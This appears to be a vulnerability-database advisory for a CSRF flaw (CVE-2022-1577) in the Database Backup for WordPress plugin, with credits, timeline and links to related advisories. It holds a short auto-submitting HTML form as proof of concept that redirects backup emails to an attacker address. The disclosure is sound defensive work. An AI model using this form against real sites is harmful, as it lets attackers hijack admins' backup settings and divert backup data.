Database Backup for WordPress < 2.5.2 – Arbitrary Schedule Settings Update via CSRF | CVE 2022-1577 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating the schedule backup settings, which could allow an attacker to make a logged in admin change them via a CSRF attack. This could lead to cases where attackers can send backup notification emails to themselves, which contain more details. Or disable the automatic backup schedule

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
    <input type="text" name="wp_cron_schedule" value="daily">
    <input type="text" name="cron_backup_recipient" value="hacked@example.com">
    <input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Fixed in 2.5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

39388900-266d-4308-88e7-d40ca6bbe346

Timeline

Publicly Published

2022-05-11 (about 3 years ago)

Added

2022-05-11 (about 3 years ago)

Last Updated

2022-05-11 (about 3 years ago)

Other

Published

Title

Published

2022-12-01

Title

Advanced Booking Calendar <= 1.7.1 - CSRF

Published

2023-03-03

Title

Resize at Upload Plus <= 1.3 - Cross-Site Request Forgery (CSRF)

Published

2025-02-17

Title

Ecwid by Lightspeed Ecommerce Shopping Cart < 6.12.28 - Cross-Site Request Forgery to Send Deactivation Message

Published

2024-02-16

Title

Microsoft Clarity < 0.9.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2022-12-23

Title

Tickera < 3.5.1.0 - Plugin Data Deletion via CSRF